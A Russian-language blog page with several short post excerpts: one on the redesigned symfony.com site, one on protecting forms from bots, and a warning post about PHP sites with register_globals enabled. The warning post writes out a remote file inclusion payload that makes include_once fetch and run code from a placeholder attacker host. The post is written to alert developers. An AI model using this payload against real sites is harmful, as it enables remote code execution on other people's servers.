symfony.com
Хотя он еще не до конца доделан, но систематизация информации на нем, как и дизайн, намного лучше, чем на предыдущем сайте. Так же обратите внимание на выпадающий список SensioLabs Network в верхнем левом углу, где в одном месте собраны ссылки на их основные сайты, теперь на сайт доктрины или свифта можно перейти намного проще.
Недавно познакомился с относительно новой идеей хака для включенных register_globals:
если в коде есть include_once($_SERVER['DOCUMENT_ROOT']."file.php")то
нам достаточно передать строчку вида: "/?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt?" чтобы произошла подстановка и выполнение нашего скрипта на сайте потребителя.
Мораль сей басни стара: будьте внимательны и не позволяйте формировать любой запрос через передаваемые параметры. UPD: Уточняю, уже существует бот на скан подобной уязвимости, и данный лог — реальный, изменен только сайт, с которого этот лог взят, так что это не просто теоретическая уязвимость.
Сейчас на хабре стала очень популярной тема защиты форм от ботов. У меня сложилось впечатление, что большинство писателей не до конца представляют себе эту задачу. Здесь я попытаюсь дать краткий обзор проблем встающих перед разработчиками и некоторые варианты их решения.